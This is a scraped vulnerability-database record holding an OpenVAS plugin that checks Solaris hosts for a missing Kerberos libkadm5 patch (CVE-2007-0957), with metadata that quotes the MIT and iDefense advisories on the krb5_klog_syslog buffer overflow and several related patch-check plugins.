ID OPENVAS:1361412562310855493 Type openvas Reporter Copyright (C) 2009 Greenbone Networks GmbH Modified 2018-04-06T00:00:00
Description
Check for the Version of libkadm5
###############################################################################
# OpenVAS Vulnerability Test
#
# Solaris Update for libkadm5 112921-09
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_affected = "libkadm5 on solaris_5.9_sparc";
tag_insight = "The remote host is missing a patch containing a security fix,
which affects the following component(s):
libkadm5
For more information please visit the below reference link.";
tag_solution = "Please Install the Updated Packages.";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.855493");
script_version("$Revision: 9370 $");
script_tag(name:"last_modification", value:"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $");
script_tag(name:"creation_date", value:"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)");
script_tag(name:"cvss_base", value:"9.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:S/C:C/I:C/A:C");
script_xref(name: "SUNSolve", value: "112921-09");
script_cve_id("CVE-2007-0957");
script_name( "Solaris Update for libkadm5 112921-09");
script_xref(name : "URL" , value : "http://sunsolve.sun.com/search/document.do?assetkey=1-21-112921-09-1");
script_tag(name:"summary", value:"Check for the Version of libkadm5");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
script_family("Solaris Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/solosversion");
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("solaris.inc");
release = get_kb_item("ssh/login/solosversion");
if(release == NULL){
exit(0);
}
if(solaris_check_patch(release:"5.9", arch:"sparc", patch:"112921-09", package:"SUNWkrbu SUNWkdcu SUNWcstlx SUNWkrbux SUNWcstl") < 0)
{
security_message(0);
exit(0);
}
{"id": "OPENVAS:1361412562310855493", "type": "openvas", "bulletinFamily": "scanner", "title": "Solaris Update for libkadm5 112921-09", "description": "Check for the Version of libkadm5", "published": "2009-06-03T00:00:00", "modified": "2018-04-06T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.0}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855493", "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["http://sunsolve.sun.com/search/document.do?assetkey=1-21-112921-09-1", "112921-09"], "cvelist": ["CVE-2007-0957"], "lastseen": "2018-04-09T11:39:48", "viewCount": 1, "enchantments": {"score": {"value": 8.9, "vector": "NONE", "modified": "2018-04-09T11:39:48", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0957"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16560", "SECURITYVULNS:VULN:7527", "SECURITYVULNS:DOC:16557"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310855127", "OPENVAS:855661", "OPENVAS:855651", "OPENVAS:1361412562310855236", "OPENVAS:855610", "OPENVAS:1361412562310855603", "OPENVAS:855493", "OPENVAS:1361412562310855025", "OPENVAS:855375", "OPENVAS:855236"]}, {"type": "osvdb", "idList": ["OSVDB:34104"]}, {"type": "cert", "idList": ["VU:704024"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:55828"]}, {"type": "nessus", "idList": ["SOLARIS8_X86_110061.NASL", "SOLARIS8_110060.NASL", "SUSE_KRB5-3046.NASL", "SOLARIS8_110061.NASL", "DEBIAN_DSA-1276.NASL", "MANDRAKE_MDKSA-2007-077.NASL", "SUSE_KRB5-3045.NASL", "SOLARIS8_X86_109224.NASL", "UBUNTU_USN-449-1.NASL", "SOLARIS8_109223.NASL"]}, {"type": "ubuntu", "idList": ["USN-449-1"]}, {"type": "gentoo", "idList": ["GLSA-200704-02"]}, {"type": "centos", "idList": ["CESA-2007:0095-01", "CESA-2007:0095"]}, {"type": "suse", "idList": ["SUSE-SA:2007:025"]}, {"type": "redhat", "idList": ["RHSA-2007:0095"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1276-1:C7435"]}, {"type": "fedora", "idList": ["FEDORA:L5SDUP1B005917", "FEDORA:L84MDMEP030074", "FEDORA:L33KDXBF030697", "FEDORA:L33KEM7F031094", "FEDORA:L5S1SAHC031057", "FEDORA:M2LMMNJ4021372", "FEDORA:L87HKEOO000802"]}, {"type": "oraclelinux", "idList": ["ELSA-2007-0095"]}, {"type": "vmware", "idList": ["VMSA-2007-0005"]}], "modified": "2018-04-09T11:39:48", "rev": 2}, "vulnersScore": 8.9}, "pluginID": "1361412562310855493", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libkadm5 112921-09\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libkadm5 on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libkadm5\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855493\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"112921-09\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for libkadm5 112921-09\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-112921-09-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of libkadm5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"112921-09\", package:\"SUNWkrbu SUNWkdcu SUNWcstlx SUNWkrbux SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "naslFamily": "Solaris Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T19:26:04", "description": "Stack-based buffer overflow in the krb5_klog_syslog function in the kadm5 library, as used by the Kerberos administration daemon (kadmind) and Key Distribution Center (KDC), in MIT krb5 before 1.6.1 allows remote authenticated users to execute arbitrary code and modify the Kerberos key database via crafted arguments, possibly involving certain format string specifiers.", "edition": 5, "cvss3": {}, "published": "2007-04-06T01:19:00", "title": "CVE-2007-0957", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0957"], "modified": "2018-10-16T16:35:00", "cpe": ["cpe:/a:mit:kerberos:5-1.6"], "id": "CVE-2007-0957", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0957", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mit:kerberos:5-1.6:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "cvelist": ["CVE-2007-0957"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n MIT krb5 Security Advisory 2007-002\r\n\r\nOriginal release: 2007-04-03\r\nLast update: 2007-04-03\r\n\r\nTopic: KDC, kadmind stack overflow in krb5_klog_syslog\r\n\r\nSeverity: CRITICAL\r\n\r\nCVE: CVE-2007-0957\r\nCERT: VU#704024\r\n\r\nSUMMARY\r\n=======\r\n\r\nThe library function krb5_klog_syslog() can write past the end of a\r\nstack buffer. The Kerberos administration daemon (kadmind) as well as\r\nthe KDC, are vulnerable. Exploitation of this vulnerability is\r\nprobably simple.\r\n\r\nThis is a vulnerability in the the kadm5 library, which is used by the\r\nKDC and kadmind, and possibly by some third-party applications. It is\r\nnot a bug in the MIT krb5 protocol libraries or in the Kerberos\r\nprotocol.\r\n\r\nIMPACT\r\n======\r\n\r\nAn authenticated user may be able to cause a host running kadmind to\r\nexecute arbitrary code.\r\n\r\nAn authenticated user may be able to cause a KDC host to execute\r\narbitrary code. Also, a user controlling a Kerberos realm sharing a\r\nkey with the target realm may be able to cause a KDC host to execute\r\narbitrary code.\r\n\r\nSuccessful exploitation can compromise the Kerberos key database and\r\nhost security on the host running these programs. (kadmind and the\r\nKDC typically run as root.) Unsuccessful exploitation attempts will\r\nlikely result in the affected program crashing.\r\n\r\nThird-party applications which call krb5_klog_syslog() may also be\r\nvulnerable.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* MIT krb5 releases through krb5-1.6\r\n\r\nFIXES\r\n=====\r\n\r\n* The upcoming krb5-1.6.1 release will contain a fix for this\r\n vulnerability.\r\n\r\nPrior to that release you may:\r\n\r\n* apply the patch\r\n\r\n The patch is available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-002-patch.txt\r\n\r\n A PGP-signed patch is available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-002-patch.txt.asc\r\n\r\n Systems which definitely provide vsnprintf() may not need the entire\r\n patch; see "DETAILS".\r\n\r\n Please note that releases prior to krb5-1.5 will require additional\r\n changes to the configure script src/lib/kadm5/configure in order to\r\n correctly detect the presence of vsnprintf(). krb5-1.5 and later\r\n releases already check for vsnprintf() in the top-level configure\r\n script, and do not have a separate src/lib/kadm5/configure script.\r\n\r\nREFERENCES\r\n==========\r\n\r\nThis announcement is posted at:\r\n\r\n http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt\r\n\r\nThis announcement and related security advisories may be found on the\r\nMIT Kerberos security advisory page at:\r\n\r\n http://web.mit.edu/kerberos/advisories/index.html\r\n\r\nThe main MIT Kerberos web page is at:\r\n\r\n http://web.mit.edu/kerberos/index.html\r\n\r\nCVE: CVE-2007-0957\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0957\r\n\r\nCERT: VU#704024\r\nhttp://www.kb.cert.org/vuls/id/704024\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nWe thank iDefense Labs for notifying us of this vulnerability.\r\niDefense credits an anonymous discoverer.\r\n\r\nDETAILS\r\n=======\r\n\r\nkrb5_klog_syslog() uses vsprintf() to format text into a fixed-length\r\nstack buffer. Format specifiers such as "%s" used in calls to\r\nkrb5_klog_syslog() may allow formatting of strings of sufficient\r\nlength to overwrite memory past the end of the stack buffer.\r\n\r\nCertain strings received from the client by the kadmin daemon are not\r\ntruncated prior to logging. Among these strings is the target\r\nprincipal for the kadmin operation.\r\n\r\nThe KDC truncates most client-originated strings prior to logging.\r\nOne sort of string which is not truncated is a transited-realms\r\nstring. A malicious KDC sharing a key with the target realm may issue\r\ntickets with specially-crafted transited-realms strings to exploit\r\nthis vulnerability. There are other places where an authenticated\r\nuser may cause the KDC to log a string which triggers the\r\nvulnerability.\r\n\r\nOn a system where vsnprintf() is confirmed to be available, the\r\npatches to files other than src/lib/kadm5/logger.c may not be\r\nnecessary to prevent a buffer overflow; these patches are still useful\r\nto prevent malicious users from causing vsnprintf() to obliterate\r\nuseful log information by means of truncation.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2007-04-03 original release\r\n\r\nCopyright (C) 2007 Massachusetts Institute of Technology\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (SunOS)\r\n\r\niQCVAwUBRhKVS6bDgE/zdoE9AQJlZgQAq/IvVdpkf3VNViwuZaAJ31+mqq17gKqX\r\n9DkxkvpPD2b5/8N/ouywP/ODCpYpT9Y+mU+Cw/hEfL2otv/o1HJcV7CXPRCEFODs\r\nYKpi2Sahcxs+jl1ZQfsY63oay6urZ0PTcrZTFQuqOv8B0wVd0XUwrSkBLejZszL3\r\nYUFR4W+wtbg=\r\n=GsBC\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2007-04-04T00:00:00", "published": "2007-04-04T00:00:00", "id": "SECURITYVULNS:DOC:16560", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16560", "title": "MITKRB5-SA-2007-002: KDC, kadmind stack overflow in krb5_klog_syslog [CVE-2007-0957]", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "cvelist": ["CVE-2007-0957"], "description": "Multiple Vendor Kerberos kadmind Buffer Overflow Vulnerability\r\n\r\niDefense Security Advisory 04.03.07\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nApr 03, 2007\r\n\r\nI. BACKGROUND\r\n\r\nKerberos is a network authentication protocol. It is used in\r\nclient-server systems to provide user authentication by using a ticket\r\nbased system. kadmind is the Kerberos administration server. It is used\r\nto configure principals and policies on the Kerberos. More information\r\ncan be found on the vendor's website at the following URL.\r\n\r\nhttp://web.mit.edu/Kerberos/\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a buffer overflow vulnerability in the Kerberos\r\nkadmind server, as included in various vendors' operating system\r\ndistributions, could allow attackers to execute arbitrary code on a\r\ntargeted host.\r\n\r\nThe vulnerability exists within the server's logging function,\r\nklog_vsyslog(). A call is made to vsprintf(), with the destination\r\nbuffer passed as a fixed size stack buffer. User input is not properly\r\nvalidated before being passed to this function, and a stack based\r\nbuffer overflow can occur.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation allows an attacker to execute arbitrary code with root\r\nprivileges on the targeted host.\r\n\r\nIn order to exploit this vulnerability, an attacker must have valid\r\ncredentials stored on the server. Administrator privileges are not\r\nnecessary. The kadmind server runs on the master Kerberos server. Since\r\nthe master server holds the KDC principal and policy database, a\r\ncompromise could lead to a compromise of multiple hosts that use the\r\nserver for authentication.\r\n\r\nIV. DETECTION\r\n\r\niDefense has confirmed the existence of this vulnerability with Kerberos\r\nversion 1.5.1 on Fedora CORE 5. It is likely that all distributions that\r\ncontain this version of Kerberos are vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\niDefense is currently unaware of any workarounds for this issue.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nThe MIT Kerberos team has made patches available to address this\r\nvulnerability. For more information consult their advisory at the\r\nfollowing URL.\r\n\r\nhttp://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2007-0957 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n02/08/2007 Initial vendor notification\r\n02/08/2007 Initial vendor response\r\n04/03/2007 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2007 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.", "edition": 1, "modified": "2007-04-04T00:00:00", "published": "2007-04-04T00:00:00", "id": "SECURITYVULNS:DOC:16557", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16557", "title": "iDefense Security Advisory 04.03.07: Multiple Vendor Kerberos kadmind Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "description": "telnet daemon arbitrary user logon without password, krb5_klog_syslog() buffer overflow, double free() vulnerability.", "edition": 1, "modified": "2007-04-11T00:00:00", "published": "2007-04-11T00:00:00", "id": "SECURITYVULNS:VULN:7527", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7527", "title": "Mltiple MIT Kerberos security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:14:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "description": "Check for the Version of Obsoleted by", "modified": "2017-02-20T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:855375", "href": "http://plugins.openvas.org/nasl.php?oid=855375", "type": "openvas", "title": "Solaris Update for Obsoleted by 109224-10", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Obsoleted by 109224-10\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Obsoleted by on solaris_5.8_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Obsoleted by\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855375);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:37:58 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109224-10\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for Obsoleted by 109224-10\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109224-10-1\");\n\n script_summary(\"Check for the Version of Obsoleted by\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"109224-10\", package:\"SUNWcsl SUNWgss SUNWcsu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "description": "Check for the Version of krb5 usr/lib", "modified": "2017-02-20T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:855610", "href": "http://plugins.openvas.org/nasl.php?oid=855610", "type": "openvas", "title": "Solaris Update for krb5 usr/lib 112923-04", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for krb5 usr/lib 112923-04\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"krb5 usr/lib on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n krb5 usr/lib\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855610);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"112923-04\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for krb5 usr/lib 112923-04\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-112923-04-1\");\n\n script_summary(\"Check for the Version of krb5 usr/lib\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"112923-04\", package:\"SUNWkrbu SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "description": "Check for the Version of kadmind & kdb5_util", "modified": "2018-04-06T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:1361412562310855236", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855236", "type": "openvas", "title": "Solaris Update for kadmind & kdb5_util 116044-04", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kadmind & kdb5_util 116044-04\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kadmind & kdb5_util on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kadmind & kdb5_util\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855236\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116044-04\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for kadmind & kdb5_util 116044-04\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116044-04-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kadmind & kdb5_util\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116044-04\", package:\"SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "description": "Check for the Version of libkadm5 library", "modified": "2018-04-06T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:1361412562310855127", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855127", "type": "openvas", "title": "Solaris Update for libkadm5 library 116175-05", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libkadm5 library 116175-05\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU 